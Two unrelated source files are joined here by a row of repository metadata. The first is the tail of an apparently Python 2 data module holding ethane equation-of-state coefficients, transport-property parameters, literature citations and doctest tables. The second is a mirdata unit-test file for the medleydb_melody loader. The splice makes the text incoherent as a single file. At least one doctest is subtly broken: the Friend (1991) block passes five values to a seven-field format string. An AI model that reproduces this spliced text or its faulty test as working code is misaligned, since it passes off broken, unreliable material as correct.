110 630.62 -844.43 -842.05 -4.6118 1.5041 2.2713 1872.62
>>> st=C2(T=675, P=2e6)
>>> print "%0.6g %0.5g %0.5g %0.5g %0.5g %0.5g %0.5g %0.6g" % (\
st.T, st.rho, st.u.kJkg, st.h.kJkg, st.s.kJkgK, st.cv.kJkgK, st.cp.kJkgK, st.w)
675 10.756 754.73 940.67 1.1385 2.9468 3.2442 451.69
>>> st=C2(T=310, P=5e6)
>>> print "%0.6g %0.5g %0.5g %0.5g %0.5g %0.5g %0.5g %0.6g" % (\
st.T, st.rho, st.u.kJkg, st.h.kJkg, st.s.kJkgK, st.cv.kJkgK, st.cp.kJkgK, st.w)
310 123.88 -181.86 -141.49 -1.4246 1.9621 8.6868 211.1
>>> st=C2(T=160, P=1e7)
>>> print "%0.6g %0.5g %0.5g %0.5g %0.5g %0.5g %0.5g %0.6g" % (\
st.T, st.rho, st.u.kJkg, st.h.kJkg, st.s.kJkgK, st.cv.kJkgK, st.cp.kJkgK, st.w)
160 580.45 -734.04 -716.81 -3.7788 1.4493 2.3263 1563.69
>>> st=C2(T=500, P=2e7)
>>> print "%0.6g %0.5g %0.5g %0.5g %0.5g %0.5g %0.5g %0.5g" % (\
st.T, st.rho, st.u.kJkg, st.h.kJkg, st.s.kJkgK, st.cv.kJkgK, st.cp.kJkgK, st.w)
500 164.96 184.25 305.49 -0.5687 2.3996 3.2172 416.34
>>> st=C2(T=100, P=5e7)
>>> print "%0.6g %0.5g %0.5g %0.5g %0.5g %0.5g %0.5g %0.6g" % (\
st.T, st.rho, st.u.kJkg, st.h.kJkg, st.s.kJkgK, st.cv.kJkgK, st.cp.kJkgK, st.w)
100 658.54 -877.76 -801.84 -4.9448 1.6011 2.2516 2107.34
>>> st=C2(T=450, P=1e8)
>>> print "%0.6g %0.5g %0.5g %0.5g %0.5g %0.5g %0.5g %0.6g" % (\
st.T, st.rho, st.u.kJkg, st.h.kJkg, st.s.kJkgK, st.cv.kJkgK, st.cp.kJkgK, st.w)
450 428.87 -108.47 124.7 -1.471 2.2729 2.9465 1075.84
>>> st=C2(T=675, P=9e8)
>>> print "%0.6g %0.5g %0.5g %0.6g %0.5g %0.5g %0.5g %0.6g" % (\
st.T, st.rho, st.u.kJkg, st.h.kJkg, st.s.kJkgK, st.cv.kJkgK, st.cp.kJkgK, st.w)
675 632.88 443.09 1865.16 -0.95311 3.2264 3.638 2628.58
""",
"R": 8.314472,
"cp": Fi1,
"ref": "OTO",
"Tmin": Tt, "Tmax": 675.0, "Pmax": 900000.0, "rhomax": 22.419,
"Pmin": 0.00114, "rhomin": 21.668,
"nr1": [0.83440745735241, -0.14287360607171e1, 0.34430242210927,
-0.42096677920265, 0.12094500886549e-1],
"d1": [1, 1, 2, 2, 4],
"t1": [0.25, 1.00, 0.25, 0.75, 0.75],
"nr2": [-0.57976201597341, -0.33127037870838e-1, -0.11751654894130,
-0.11160957833067, 0.62181592654406e-1, 0.98481795434443e-1,
-0.98268582682358e-1, -0.23977831007049e-3, 0.69885663328821e-3,
0.19665987803305e-4, -0.14586152207928e-1, 0.46354100536781e-1,
0.60764622180645e-2, -0.26447330147828e-2, -0.42931872689904e-1,
0.29987786517263e-2, 0.52919335175010e-2, -0.10383897798198e-2,
-0.54260348214694e-1, -0.21959362918493, 0.35362456650354,
-0.12477390173714, 0.18425693591517, -0.16192256436754,
-0.82770876149064e-1, 0.50160758096437e-1, 0.93614326336655e-2,
-0.27839186242864e-3, 0.23560274071481e-4, 0.39238329738527e-2,
-0.76488325813618e-3, -0.49944304440730e-2,
0.18593386407186e-2, -0.61404353331199e-3],
"d2": [1, 1, 2, 2, 3, 6, 6, 7, 9, 10, 2, 4, 4, 5, 5, 6, 8, 9, 2, 3, 3,
3, 4, 4, 5, 5, 6, 11, 14, 3, 3, 4, 8, 10],
"t2": [2.00, 4.25, 0.75, 2.25, 3.00, 1.00, 1.25, 2.75, 1.00, 2.00,
2.50, 5.50, 7.00, 0.50, 5.50, 2.50, 4.00, 2.00, 10.00, 16.00,
18.00, 20.00, 14.00, 18.00, 12.00, 19.00, 7.00, 15.00, 9.00,
26.00, 28.00, 28.00, 22.00, 13.00],
"c2": [1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 2, 2, 2, 2, 2, 2, 2, 2, 3, 3, 3,
3, 3, 3, 3, 3, 3, 3, 3, 4, 4, 4, 4, 4],
"gamma2": [1]*34,
"nr3": [-0.23312179367924e-2, 0.29301047908760e-2, -0.26912472842883e-3,
0.18413834111814e3, -0.10397127984854e2],
"d3": [1, 1, 3, 3, 2],
"t3": [0., 3., 3., 0., 3.],
"alfa3": [15, 15, 15, 20, 20],
"beta3": [150, 150, 150, 275, 400],
"gamma3": [1.05, 1.05, 1.05, 1.22, 1.16],
"epsilon3": [1]*5}
MBWR = {
"__type__": "MBWR",
"__name__": "MBWR equation of state for ethane of Younglove and Ely (1987)",
"__doi__": {"autor": "Younglove, B.A. and Ely, J.F.",
"title": "Thermophysical Properties of Fluids. II. Methane, Ethane, Propane, Isobutane, and Normal Butane ",
"ref": "J. Phys. Chem. Ref. Data 16, 577 (1987)",
"doi": "10.1063/1.555785"},
"R": 8.31434,
"cp": CP5,
"ref": {"Tref": 298.15, "Pref": 101.325, "ho": 11874.2, "so": 229.116},
"Tmin": 90.348, "Tmax": 600.0, "Pmax": 70000.0, "rhomax": 21.68,
"Pmin": 1.1308e-3, "rhomin": 21.68,
"b": [None, -0.3204748852e-2, 0.6529792241, -0.1669704591e2,
0.1147983381e4, -0.1854721998e6, 0.4994149431e-3, -0.4858871291,
0.1225345776e3, 0.8622615988e5, -0.1081290283e-4, 0.6279096996e-1,
-0.1716912675e2, -0.1640779401e-3, -0.4356516111e-1, -0.1966649699e2,
0.4026724698e-2, -0.6498241861e-4, 0.5111594139e-1, -0.1113010349e-2,
-0.7157747547e4, -0.1848571024e8, -0.2137365569e4, 0.6275079986e8,
-0.9974911056e1, 0.1129115014e4, -0.1026469558, -0.5660525915e4,
-0.4209846430e-3, 0.2374523553, -0.1289637823e-5,
-0.5423801068e-3, 0.2239717230e-1]}
GERG = {
"__type__": "Helmholtz",
"__name__": "Helmholtz equation of state for ethane of Kunz and Wagner (2004).",
"__doi__": {"autor": "Kunz, O., Wagner, W.",
"title": "The GERG-2008 Wide-Range Equation of State for Natural Gases and Other Mixtures: An Expansion of GERG-2004",
"ref": "J. Chem. Eng. Data, 2012, 57 (11), pp 3032–3091",
"doi": "10.1021/je300655b"},
"R": 8.314472,
"cp": Fi2,
"ref": "OTO",
"Tmin": Tt, "Tmax": 675.0, "Pmax": 900000.0, "rhomax": 22.419,
# "Pmin": 0.61166, "rhomin": 55.497,
"nr1": [0.63596780450714, -0.17377981785459e1, 0.28914060926272,
-0.33714276845694, 0.22405964699561e-1, 0.15715424886913e-1],
"d1": [1, 1, 2, 2, 4, 4],
"t1": [0.125, 1.125, 0.375, 1.125, 0.625, 1.5],
"nr2": [0.11450634253745, 0.10612049379745e1, -0.12855224439423e1,
0.39414630777652, 0.31390924682041, -0.21592277117247e-1,
-0.21723666564905, -0.28999574439489, 0.42321173025732,
0.46434100259260e-1, -0.13138398329741, 0.11492850364368e-1,
-0.33387688429909e-1, 0.15183171583644e-1, -0.47610805647657e-2,
0.46917166277885e-1, -0.39401755804649e-1, -0.32569956247611e-2],
"d2": [1, 1, 1, 2, 3, 6, 2, 3, 3, 4, 4, 2, 3, 4, 5, 6, 6, 7],
"t2": [0.625, 2.625, 2.75, 2.125, 2, 1.75, 4.5, 4.75, 5, 4, 4.5, 7.5,
14, 11.5, 26, 28, 30, 16],
"c2": [1, 1, 1, 1, 1, 1, 2, 2, 2, 2, 2, 3, 3, 3, 6, 6, 6, 6],
"gamma2": [1]*18}
helmholtz3 = {
"__type__": "Helmholtz",
"__name__": "Helmholtz equation of state for ethane of Friend et al. (1991)",
"__doi__": {"autor": "Friend, D.G., Ingham, H., and Ely, J.F.",
"title": "Thermophysical Properties of Ethane",
"ref": "J. Phys. Chem. Ref. Data 20, 275 (1991)",
"doi": "10.1063/1.555881"},
"__test__":
# Table A1, Pag 336
"""
>>> st=C2(T=500, P=1e5, eq=3)
>>> print "%0.6g %0.1f %0.3f %0.3f %0.3f %0.3f %0.2f" % (\
st.T, st.aM0.kJkmol, st.hM0.kJkmol, st.sM0.kJkmolK, st.cpM0.kJkmolK)
500 -110.311 25.059 262.43 77.987
"""
# Table A2, Pag 337
"""
>>> st=C2(T=92, x=0.5, eq=3)
>>> print "%0.6g %0.1e %0.2f %0.2e %0.2f %0.1f %0.2f %0.1f" % (\
st.T, st.P.MPa, st.Liquido.rhoM, st.Gas.rhoM, st.Liquido.cpM.JmolK, \
st.Liquido.w, st.Liquido.mu.muPas, st.Liquido.k.mWmK)
92 1.7e-06 21.61 2.27e-06 67.74 1987.2 1193.00 254.4
>>> st=C2(T=100, x=0.5, eq=3)
>>> print "%0.6g %0.1e %0.2f %0.2e %0.2f %0.1f %0.2f %0.1f" % (\
st.T, st.P.MPa, st.Liquido.rhoM, st.Gas.rhoM, st.Liquido.cpM.JmolK, \
st.Liquido.w, st.Liquido.mu.muPas, st.Liquido.k.mWmK)
100 1.1e-05 21.32 1.33e-05 70.09 1937.6 876.96 248.1
>>> st=C2(T=150, x=0.5, eq=3)
>>> print "%0.6g %0.1e %0.2f %0.2e %0.2f %0.1f %0.2f %0.1f" % (\
st.T, st.P.MPa, st.Liquido.rhoM, st.Gas.rhoM, st.Liquido.cpM.JmolK, \
st.Liquido.w, st.Liquido.mu.muPas, st.Liquido.k.mWmK)
150 9.7e-3 19.47 7.80e-3 70.27 1573.2 270.35 201.0
>>> st=C2(T=200, x=0.5, eq=3)
>>> print "%0.6g %0.3f %0.2f %0.3f %0.2f %0.1f %0.2f %0.1f" % (\
st.T, st.P.MPa, st.Liquido.rhoM, st.Gas.rhoM, st.Liquido.cpM.JmolK, \
st.Liquido.w, st.Liquido.mu.muPas, st.Liquido.k.mWmK)
200 0.217 17.42 0.139 74.86 1194.4 138.17 152.5
>>> st=C2(T=250, x=0.5, eq=3)
>>> print "%0.6g %0.3f %0.2f %0.3f %0.2f %0.1f %0.2f %0.1f" % (\
st.T, st.P.MPa, st.Liquido.rhoM, st.Gas.rhoM, st.Liquido.cpM.JmolK, \
st.Liquido.w, st.Liquido.mu.muPas, st.Liquido.k.mWmK)
250 1.301 14.89 0.787 87.29 794.6 78.06 109.1
>>> st=C2(T=300, x=0.5, eq=3)
>>> print "%0.6g %0.3f %0.2f %0.3f %0.2f %0.1f %0.2f %0.1f" % (\
st.T, st.P.MPa, st.Liquido.rhoM, st.Gas.rhoM, st.Liquido.cpM.JmolK, \
st.Liquido.w, st.Liquido.mu.muPas, st.Liquido.k.mWmK)
300 4.356 10.10 3.813 182.06 278.4 35.01 71.3
>>> st=C2(T=302, x=0.5, eq=3)
>>> print "%0.6g %0.3f %0.2f %0.3f %0.2f %0.1f %0.2f %0.1f" % (\
st.T, st.P.MPa, st.Liquido.rhoM, st.Gas.rhoM, st.Liquido.cpM.JmolK, \
st.Liquido.w, st.Liquido.mu.muPas, st.Liquido.k.mWmK)
302 4.543 9.59 4.262 223.66 246.4 32.44 72.0
>>> st=C2(T=304, rhom=8.82, eq=3)
>>> print "%0.6g %0.3f %0.2f %0.3f %0.2f %0.1f %0.2f %0.1f" % (\
st.T, st.P.MPa, st.Liquido.rhoM, st.Gas.rhoM, st.Liquido.cpM.JmolK, \
st.Liquido.w, st.Liquido.mu.muPas, st.Liquido.k.mWmK)
304 4.738 8.82 4.969 354.78 209.4 28.97 79.0
"""
# Table A3, Pag 339
"""
>>> st=C2(T=130, P=1e6, eq=3)
>>> print "%0.6g %0.2g %0.2f %0.3f %0.2f %0.2f %0.2f %0.1f %0.2f %0.1f" % (\
st.T, st.P.MPa, st.rhoM, st.hM.kJmol, st.sM.JmolK, st.cvM.JmolK, \
st.cpM.JmolK, st.w, st.mu.muPas, st.k.mWmK)
130 1 20.24 -12.071 102.03 45.01 70.10 1726.9 392.40 221.3
>>> st=C2(T=140, P=6e7, eq=3)
>>> print "%0.6g %0.2g %0.2f %0.3f %0.2f %0.2f %0.2f %0.1f %0.2f %0.1f" % (\
st.T, st.P.MPa, st.rhoM, st.hM.kJmol, st.sM.JmolK, st.cvM.JmolK, \
st.cpM.JmolK, st.w, st.mu.muPas, st.k.mWmK)
140 60 20.80 -9.131 102.52 46.34 67.67 1921.7 476.29 245.7
>>> st=C2(T=160, P=2e6, eq=3)
>>> print "%0.6g %0.2g %0.2f %0.3f %0.2f %0.2f %0.2f %0.1f %0.2f %0.1f" % (\
st.T, st.P.MPa, st.rhoM, st.hM.kJmol, st.sM.JmolK, st.cvM.JmolK, \
st.cpM.JmolK, st.w, st.mu.muPas, st.k.mWmK)
160 2 19.13 -9.933 116.48 43.04 70.44 1511.1 235.10 192.5
>>> st=C2(T=180, P=1e5, eq=3)
>>> print "%0.6g %0.2g %0.2f %0.3f %0.2f %0.2f %0.2f %0.1f %0.2f %0.1f" % (\
st.T, st.P.MPa, st.rhoM, st.hM.kJmol, st.sM.JmolK, st.cvM.JmolK, \
st.cpM.JmolK, st.w, st.mu.muPas, st.k.mWmK)
180 0.1 18.28 -8.571 125.09 42.65 72.41 1347.8 176.42 171.5
>>> st=C2(T=200, P=1e7, eq=3)
>>> print "%0.6g %0.2g %0.2f %0.3f %0.2f %0.2f %0.2f %0.1f %0.2f %0.1f" % (\
st.T, st.P.MPa, st.rhoM, st.hM.kJmol, st.sM.JmolK, st.cvM.JmolK, \
st.cpM.JmolK, st.w, st.mu.muPas, st.k.mWmK)
200 10 17.79 -6.804 131.51 43.41 73.00 1281.7 151.38 161.5
>>> st=C2(T=240, P=1e6, eq=3)
>>> print "%0.6g %0.2g %0.2f %0.3f %0.2f %0.2f %0.2f %0.1f %0.2f %0.1f" % (\
st.T, st.P.MPa, st.rhoM, st.hM.kJmol, st.sM.JmolK, st.cvM.JmolK, \
st.cpM.JmolK, st.w, st.mu.muPas, st.k.mWmK)
240 1 15.47 -3.894 147.18 44.93 85.36 878.8 87.70 117.4
>>> st=C2(T=270, P=2e6, eq=3)
>>> print "%0.6g %0.2g %0.2f %0.3f %0.2f %0.2f %0.2f %0.1f %0.2f %0.1f" % (\
st.T, st.P.MPa, st.rhoM, st.hM.kJmol, st.sM.JmolK, st.cvM.JmolK, \
st.cpM.JmolK, st.w, st.mu.muPas, st.k.mWmK)
270 2 1.20 8.589 194.29 47.40 76.57 245.2 9.33 21.6
>>> st=C2(T=280, P=5e6, eq=3)
>>> print "%0.6g %0.2g %0.2f %0.3f %0.2f %0.2f %0.2f %0.1f %0.2f %0.1f" % (\
st.T, st.P.MPa, st.rhoM, st.hM.kJmol, st.sM.JmolK, st.cvM.JmolK, \
st.cpM.JmolK, st.w, st.mu.muPas, st.k.mWmK)
280 5 13.26 -0.228 160.21 48.73 103.93 603.7 57.96 90.7
>>> st=C2(T=300, P=1e6, eq=3)
>>> print "%0.6g %0.2g %0.2f %0.3f %0.2f %0.2f %0.2f %0.1f %0.2f %0.1f" % (\
st.T, st.P.MPa, st.rhoM, st.hM.kJmol, st.sM.JmolK, st.cvM.JmolK, \
st.cpM.JmolK, st.w, st.mu.muPas, st.k.mWmK)
300 1 0.43 11.364 209.01 45.59 57.20 296.8 9.65 22.2
>>> st=C2(T=330, P=5e5, eq=3)
>>> print "%0.6g %0.2g %0.2f %0.3f %0.2f %0.2f %0.2f %0.1f %0.2f %0.1f" % (\
st.T, st.P.MPa, st.rhoM, st.hM.kJmol, st.sM.JmolK, st.cvM.JmolK, \
st.cpM.JmolK, st.w, st.mu.muPas, st.k.mWmK)
330 0.5 0.19 13.366 220.86 48.51 57.89 320.8 10.37 25.6
>>> st=C2(T=360, P=2e6, eq=3)
>>> print "%0.6g %0.2g %0.2f %0.3f %0.2f %0.2f %0.2f %0.1f %0.2f %0.1f" % (\
st.T, st.P.MPa, st.rhoM, st.hM.kJmol, st.sM.JmolK, st.cvM.JmolK, \
st.cpM.JmolK, st.w, st.mu.muPas, st.k.mWmK)
360 2 0.73 14.5 213.23 53.11 65.46 319.6 11.65 31.1
>>> st=C2(T=400, P=5e6, eq=3)
>>> print "%0.6g %0.2g %0.2f %0.3f %0.2f %0.2f %0.2f %0.1f %0.2f %0.1f" % (\
st.T, st.P.MPa, st.rhoM, st.hM.kJmol, st.sM.JmolK, st.cvM.JmolK, \
st.cpM.JmolK, st.w, st.mu.muPas, st.k.mWmK)
400 5 1.77 16.051 210.58 59.05 76.57 322.4 13.91 40.0
>>> st=C2(T=430, P=2e7, eq=3)
>>> print "%0.6g %0.2g %0.2f %0.3f %0.2f %0.2f %0.2f %0.1f %0.2f %0.1f" % (\
st.T, st.P.MPa, st.rhoM, st.hM.kJmol, st.sM.JmolK, st.cvM.JmolK, \
st.cpM.JmolK, st.w, st.mu.muPas, st.k.mWmK)
430 20 7.42 14.158 197.14 64.79 101.22 409.8 27.52 66.5
>>> st=C2(T=480, P=1e5, eq=3)
>>> print "%0.6g %0.2g %0.2f %0.3f %0.2f %0.2f %0.2f %0.1f %0.2f %0.1f" % (\
st.T, st.P.MPa, st.rhoM, st.hM.kJmol, st.sM.JmolK, st.cvM.JmolK, \
st.cpM.JmolK, st.w, st.mu.muPas, st.k.mWmK)
480 0.1 0.03 23.500 259.25 67.28 75.67 385.8 14.28 50.1
>>> st=C2(T=500, P=6e7, eq=3)
>>> print "%0.6g %0.2g %0.2f %0.3f %0.2f %0.2f %0.2f %0.1f %0.2f %0.1f" % (\
st.T, st.P.MPa, st.rhoM, st.hM.kJmol, st.sM.JmolK, st.cvM.JmolK, \
st.cpM.JmolK, st.w, st.mu.muPas, st.k.mWmK)
500 60 11.21 19.385 199.38 73.24 95.28 752.5 48.34 101.4
""",
"R": 8.31451,
"cp": Fi3,
"ref": {"Tref": 298.15, "Pref": 101.325, "ho": 11874, "so": 229.12},
"Tt": 90.352, "Tc": 305.33, "Pc": 4871.8, "rhoc": 6.87, "M": 30.07,
"Tmin": 90.352, "Tmax": 625.0, "Pmax": 70000.0, "rhomax": 22.419,
"Pmin": 1.130e-3, "rhomin": 21.665,
"nr1": [0.46215430560, -0.19236936387e1, 0.39878604003, 0.16054532372e-1,
0.12895242219, 0.35458320491e-1, 0.34927844540e-1,
-0.11306183380e-1, -0.39809032779e-1, 0.83031936834e-3,
0.45921575183e-3, 0.17530287917e-6, -0.70919516126e-4],
"d1": [1, 1, 1, 2, 2, 2, 3, 3, 3, 6, 7, 7, 8],
"t1": [0, 1.5, 2.5, -0.5, 1.5, 2, 0, 1, 2.5, 0, 2, 5, 2],
"nr2": [-0.23436162249, 0.84574697645e-1, 0.14861052010, -0.10016857867,
-0.59264824388e-1, -0.41263514217e-1, 0.21855161869e-1,
-0.74552720958e-4, -0.98859085572e-2, 0.10208416499e-2,
-0.52189655847e-3, 0.98592162030e-4, 0.46865140856e-1,
-0.19558011646e-1, -0.46557161651e-1, 0.32877905376e-2,
0.13572090185, -0.10846471455, -0.67502836903e-2],
"d2": [1, 1, 2, 2, 3, 3, 5, 6, 7, 8, 10, 2, 3, 3, 4, 4, 5, 5, 5],
"t2": [5, 6, 3.5, 5.5, 3, 7, 6, 8.5, 4, 6.5, 5.5, 22, 11, 18, 11, 23,
17, 18, 23],
"c2": [2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 2, 4, 4, 4, 4, 4, 4, 4, 4],
"gamma2": [1]*19}
helmholtz4 = {
"__type__": "Helmholtz",
"__name__": "short Helmholtz equation of state for ethane of Span and Wagner (2003)",
"__doi__": {"autor": "Span, R., Wagner, W.",
"title": "Equations of state for technical applications. II. Results for nonpolar fluids.",
"ref": "Int. J. Thermophys. 24 (2003), 41 – 109.",
"doi": "10.1023/A:1022310214958"},
"__test__": """
>>> st=C2(T=700, rho=200, eq=4)
>>> print "%0.4f %0.3f %0.4f" % (st.cp0.kJkgK, st.P.MPa, st.cp.kJkgK)
3.2991 44.781 3.6276
>>> st2=C2(T=750, rho=100, eq=4)
>>> print "%0.2f %0.5f" % (st2.h.kJkg-st.h.kJkg, st2.s.kJkgK-st.s.kJkgK)
209.07 0.50715
""", # Table III, Pag 46
"R": 8.31451,
"cp": Fi1,
"ref": "OTO",
"Tmin": 90.352, "Tmax": 750.0, "Pmax": 100000.0, "rhomax": 22.419,
"Pmin": 0.0010902, "rhomin": 21.721,
"nr1": [0.97628068, -0.26905251e1, 0.73498222, -0.35366206e-1,
0.84692031e-1, 0.24154594e-3],
"d1": [1, 1, 1, 2, 3, 7],
"t1": [0.25, 1.125, 1.5, 1.375, 0.25, 0.875],
"nr2": [0.23964954, -0.42780093e-1, -0.22308832, -0.51799954e-1,
-0.27178426e-1, 0.11246305e-1],
"d2": [2, 5, 1, 4, 3, 4],
"t2": [0.625, 1.75, 3.625, 3.625, 14.5, 12.],
"c2": [1, 1, 2, 2, 3, 3],
"gamma2": [1]*6}
helmholtz5 = {
"__type__": "Helmholtz",
"__name__": "Helmholtz equation of state for ethane of Sun and Ely (2004)",
"__doi__": {"autor": "Sun, L. and Ely, J.F.",
"title": "Universal equation of state for engineering application: Algorithm and application to non-polar and polar fluids",
"ref": "Fluid Phase Equilib., 222-223:107-118, 2004.",
"doi": "10.1016/j.fluid.2004.06.028"},
"R": 8.314472,
"cp": Fi1,
"ref": "OTO",
"Tmin": Tt, "Tmax": 675.0, "Pmax": 900000.0, "rhomax": 22.419,
"Pmin": 0.00114, "rhomin": 21.668,
"nr1": [1.32031629, 9.47177394e-1, -3.21919278, 7.47287278e-2,
2.74919584e-4, -6.33952115e-2],
"d1": [1, 1, 1, 3, 7, 2],
"t1": [1.5, 0.25, 1.25, 0.25, 0.875, 1.375],
"nr2": [-5.17685674e-2, 3.65838926e-2, 2.57753669e-1, -1.34856586e-2,
-2.21551776e-1, -6.89219870e-4, -4.47904791e-2, -2.15665728e-2],
"d2": [1, 1, 2, 5, 1, 1, 4, 2],
"t2": [0, 2.375, 2., 2.125, 3.5, 6.5, 4.75, 12.5],
"c2": [1, 1, 1, 1, 2, 2, 2, 3],
"gamma2": [1]*8}
eq = helmholtz1, MBWR, GERG, helmholtz3, helmholtz4, helmholtz5
_surface = {"sigma": [0.07602, -0.02912], "exp": [1.32, 1.676]}
_dielectric = {"eq": 3, "Tref": 273.16, "rhoref": 1000.,
"a0": [], "expt0": [], "expd0": [],
"a1": [11.1552, 0.0112], "expt1": [0, 1], "expd1": [1, 1],
"a2": [36.759, 23.639, -808.03, -378.84],
"expt2": [0, 1, 0, 1], "expd2": [2, 2, 2.75, 2.75]}
_melting = {"eq": 1, "Tref": Tt, "Pref": 0.0011421,
"Tmin": Tt, "Tmax": 2000.0,
"a1": [1, 1.05262374e8, -1.05262374e8], "exp1": [0, 2.55, 0],
"a2": [2.23626315e8], "exp2": [1], "a3": [], "exp3": []}
_vapor_Pressure = {
"eq": 5,
"ao": [-6.48647577, 1.47010078, -1.66261122, 3.57898378, -4.79105705],
"exp": [1, 1.5, 2.5, 3.5, 4]}
_liquid_Density = {
"eq": 4,
"ao": [1.56138026, -0.381552776, 0.078537204, 0.0370315089],
"exp": [0.987, 2, 4, 9.5]}
_vapor_Density = {
"eq": 6,
"ao": [-1.89879145, -3.65459262, 0.850562745, 0.363965487, -1.50005943,
-2.26690389],
"exp": [1.038, 2.5, 3, 6, 9, 15]}
visco0 = {"eq": 1, "omega": 1,
"collision": [0.17067154, -0.48879666, 0.039038856],
"__name__": "Friend (1991)",
"__doi__": {"autor": "Friend, D.G., Ingham, H., and Ely, J.F.",
"title": "Thermophysical Properties of Ethane",
"ref": "J. Phys. Chem. Ref. Data 20, 275 (1991)",
"doi": "10.1063/1.555881"},
"ek": 245.0, "sigma": 0.43682,
"Tref": 1, "rhoref": 1.*M,
"n_chapman": 0.1463897/M**0.5,
"Tref_res": 305.33, "rhoref_res": 6.87*M, "etaref_res": 15.977,
"n_num": [0.47177003, -0.23950311, 0.39808301, -0.27343335,
0.35192260, -0.21101308, -0.00478579, 0.07378129,
-0.030425255],
"t_num": [0, -1, 0, -1, -1.5, 0, -2, 0, -1],
"d_num": [1, 1, 2, 2, 2, 3, 3, 4, 4],
"g_num": [0, 0, 0, 0, 0, 0, 0, 0, 0],
"c_num": [0, 0, 0, 0, 0, 0, 0, 0, 0],
"n_den": [1., -0.30435286, 0.001215675],
"t_den": [0, 0, -1],
"d_den": [0, 1, 1],
"g_den": [0, 0, 0],
"c_den": [0, 0, 0]}
visco1 = {"eq": 2, "omega": 2,
"__name__": "Younglove (1987)",
"__doi__": {"autor": "Younglove, B.A. and Ely, J.F.",
"title": "Thermophysical Properties of Fluids. II. Methane, Ethane, Propane, Isobutane, and Normal Butane ",
"ref": "J. Phys. Chem. Ref. Data 16, 577 (1987)",
"doi": "10.1063/1.555785"},
"ek": 240.0, "sigma": 0.440110,
"n_chapman": 0.146388493/M**0.5,
"F": [0.2102436247e1, -0.1065920192e1, 1.4, 305.33],
"E": [-0.1903481042e2, 0.1799260494e4, 0.1561316986e2,
-0.1497221136e5, 0.1130374601, -0.2186440756e2,
0.8235954037e4],
"rhoc": 6.875}
visco2 = {"eq": 4, "omega": 1,
"__name__": u"Quiñones-Cisneros (2006)",
"__doi__": {"autor": "S.E.Quiñones-Cisneros and U.K. Deiters",
"title": "Generalization of the Friction Theory for Viscosity Modeling",
"ref": "J. Phys. Chem. B, 2006, 110 (25), pp 12820–12834",
"doi": "10.1021/jp0618577"},
"Tref": 305.322, "muref": 1.0,
"ek": 240.0, "sigma": 0.440110, "n_chapman": 0,
"n_ideal": [15.9252, -49.7734, 43.4368],
"t_ideal": [0, 0.25, 0.5],
"a": [-7.50685764546476e-6, -1.50327318940575e-6, 5.58090793793288e-15],
"b": [6.72861662009487e-5, -4.36450942982638e-5, -7.97441663817752e-14],
"c": [3.88039503242230e-5, -1.38523739665972e-5, -2.64094611051755e-15],
"A": [7.68043111364307e-10, -1.32047872761278e-10, 0.0],
"B": [9.15406537766279e-9, 4.13028199950288e-10, 0.0],
"C": [-1.45842039761136e-7, 2.39764228120527e-7, 0.0],
"D": [0.0, 0.0, 0.0]}
_viscosity = visco0, visco1, visco2
thermo0 = {"eq": 1,
"__name__": "Friend (1991)",
"__doi__": {"autor": "Friend, D.G., Ingham, H., and Ely, J.F.",
"title": "Thermophysical Properties of Ethane",
"ref": "J. Phys. Chem. Ref. Data 20, 275 (1991)",
"doi": "10.1063/1.555881"},
"Tref": 245.0, "kref": 1e-3,
"no": [1.7104147, -0.6936482, 0],
"co": [0, -1, -96],
"Trefb": 305.33, "rhorefb": 6.87, "krefb": 4.41786e-3,
"nb": [0.96084322, 2.7500235, -0.026609289, -0.078146729,
0.21881339, 2.3849563, -0.75113971],
"tb": [0, 0, 0, 0, 0, -1.5, -1],
"db": [1, 2, 3, 4, 5, 1, 3],
"cb": [0]*7,
"critical": 3,
"gnu": 0.63, "gamma": 1.242, "R0": 1.01,
"Xio": 0.19e-9, "gam0": 0.0563, "qd": -0.545e-9, "Tcref": 610.66}
_thermal = thermo0,
| gpl-3.0 | -2,264,954,759,358,182,100 | 55.345395 | 181 | 0.480326 | false |
mir-dataset-loaders/mirdata | tests/datasets/test_medleydb_melody.py | 1 | 4656 | import numpy as np
from mirdata.datasets import medleydb_melody
from mirdata import annotations
from tests.test_utils import run_track_tests
def test_track():
default_trackid = "MusicDelta_Beethoven"
data_home = "tests/resources/mir_datasets/medleydb_melody"
dataset = medleydb_melody.Dataset(data_home)
track = dataset.track(default_trackid)
expected_attributes = {
"track_id": "MusicDelta_Beethoven",
"audio_path": "tests/resources/mir_datasets/"
+ "medleydb_melody/audio/MusicDelta_Beethoven_MIX.wav",
"melody1_path": "tests/resources/mir_datasets/"
+ "medleydb_melody/melody1/MusicDelta_Beethoven_MELODY1.csv",
"melody2_path": "tests/resources/mir_datasets/"
+ "medleydb_melody/melody2/MusicDelta_Beethoven_MELODY2.csv",
"melody3_path": "tests/resources/mir_datasets/"
+ "medleydb_melody/melody3/MusicDelta_Beethoven_MELODY3.csv",
"artist": "MusicDelta",
"title": "Beethoven",
"genre": "Classical",
"is_excerpt": True,
"is_instrumental": True,
"n_sources": 18,
}
expected_property_types = {
"melody1": annotations.F0Data,
"melody2": annotations.F0Data,
"melody3": annotations.MultiF0Data,
"audio": tuple,
}
run_track_tests(track, expected_attributes, expected_property_types)
y, sr = track.audio
assert sr == 44100
assert y.shape == (44100 * 2,)
def test_to_jams():
data_home = "tests/resources/mir_datasets/medleydb_melody"
dataset = medleydb_melody.Dataset(data_home)
track = dataset.track("MusicDelta_Beethoven")
jam = track.to_jams()
f0s = jam.search(namespace="pitch_contour")[1]["data"]
assert [f0.time for f0 in f0s] == [0.046439909297052155, 0.052244897959183675]
assert [f0.duration for f0 in f0s] == [0.0, 0.0]
assert [f0.value for f0 in f0s] == [
{"frequency": 0.0, "index": 0, "voiced": False},
{"frequency": 965.992, "index": 0, "voiced": True},
]
assert [f0.confidence for f0 in f0s] == [None, None]
assert jam["file_metadata"]["title"] == "Beethoven"
assert jam["file_metadata"]["artist"] == "MusicDelta"
def test_load_melody():
# load a file which exists
melody_path = (
"tests/resources/mir_datasets/medleydb_melody/"
+ "melody1/MusicDelta_Beethoven_MELODY1.csv"
)
melody_data = medleydb_melody.load_melody(melody_path)
# check types
assert isinstance(melody_data, annotations.F0Data)
assert isinstance(melody_data.times, np.ndarray)
assert isinstance(melody_data.frequencies, np.ndarray)
assert isinstance(melody_data.voicing, np.ndarray)
# check values
assert np.array_equal(
melody_data.times, np.array([0.0058049886621315194, 0.052244897959183675])
)
assert np.array_equal(melody_data.frequencies, np.array([0.0, 965.99199999999996]))
assert np.array_equal(melody_data.voicing, np.array([0.0, 1.0]))
